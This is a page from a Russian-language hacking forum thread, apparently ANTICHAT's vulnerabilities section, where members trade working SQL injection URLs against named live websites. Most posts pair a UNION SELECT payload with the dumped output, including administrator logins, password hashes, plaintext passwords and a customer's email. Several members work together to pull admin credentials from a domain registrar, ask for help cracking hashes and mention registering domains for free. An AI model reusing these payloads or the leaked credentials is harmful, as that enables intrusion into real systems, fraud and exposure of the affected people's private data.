HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7241  
Старый 30.12.2008, 00:44
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex
Код:
http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname,lastname,firstname,secondname,email,login,password,register_time,status,type,register_id),4,5,6+from+users--
Логин/пасс:
Код:
tigranav:8791109100
--------------------------------------------------
The End!
 
Ответить с цитированием

  #7242  
Старый 30.12.2008, 01:37
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

purple.fr магазинчик

http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database (),user())/*

5.0.32-Debian_7etch8-log/purple/purple@localhost


http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login ,passwd))+from+user/*

root/6teutd7UL7NG.


http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,email,passwd)+from +customer+limit+4200,1/*

felipe_e@hotmail.com/19l0ZUzMeK.b.
 
Ответить с цитированием

  #7243  
Старый 30.12.2008, 01:42
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Код:
http://forparentssake.com/index.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8+from+users--
aDMin:03110WoodBury
 
Ответить с цитированием

  #7244  
Старый 30.12.2008, 01:43
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


Thumbs up

Вот кароче что я обкуренный нафигачил:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((

Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!
 
Ответить с цитированием

  #7245  
Старый 30.12.2008, 02:01
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(concat(use rname,0x3A,password)))),3,4,5+from+naira_clients.t bladmins--
За group_concat - спасибо, незнал.
 
Ответить с цитированием

  #7246  
Старый 30.12.2008, 02:02
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

-m0rgan-, а финальный - это какой ?)

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x2F,username,password) ,3,4,5+from+naira_clients.tbladmins

ADMIN/E7AA807F2B59DE7B73495FF59B30EC26

опередили, потрите плз )
 
Ответить с цитированием

  #7247  
Старый 30.12.2008, 02:04
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

Цитата:
Сообщение от -m0rgan-  
Вот кароче что я обкуренный нафигачил:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
Из таблицы tbladmins:
Код:
http://www.nairadomains.com/news.php?id=-1+union+select+1,unhex(hex(group_concat(table_name))),3,4,5+from+information_schema.tables--
А вот составить финальный запрос не получилось, как я токо не шифровал...((((

Кароче кто сможет, отпишитесь ниже(!!!), будем все домены на халяву регать=))))
------------------------------------------------------------
The End!
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
 
Ответить с цитированием

  #7248  
Старый 30.12.2008, 02:19
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

А мне он выдал

http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admins--

master:master

тока в админку не пускает (
 
Ответить с цитированием

  #7249  
Старый 30.12.2008, 02:21
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами: 9147012

Репутация: 9
По умолчанию

Цитата:
Сообщение от masternet  
http://www.nairadomains.com/news.php?id=-1+union+select+1,concat_ws(char(32,45,32),username ,password),3,4,5+from+naira_clients.tbladmins--
элементарно,ватсон!
расшифруете хеш пмните мне)))
И мне в ПМ плз!!!!
 
Ответить с цитированием

  #7250  
Старый 30.12.2008, 02:48
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Aattcottonbowl.com - PR5 ~2к
Цитата:
http://www.attcottonbowl.com/news_room/releases.php?uid=210'+union+select+1,2,3,4,5,email ,7,uid,9,10,11,12,13,version(),15,16+from+user+lim it+1,1/*
4 ветка.. подбирайте поля )
 
Ответить с цитированием
Ответ





Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.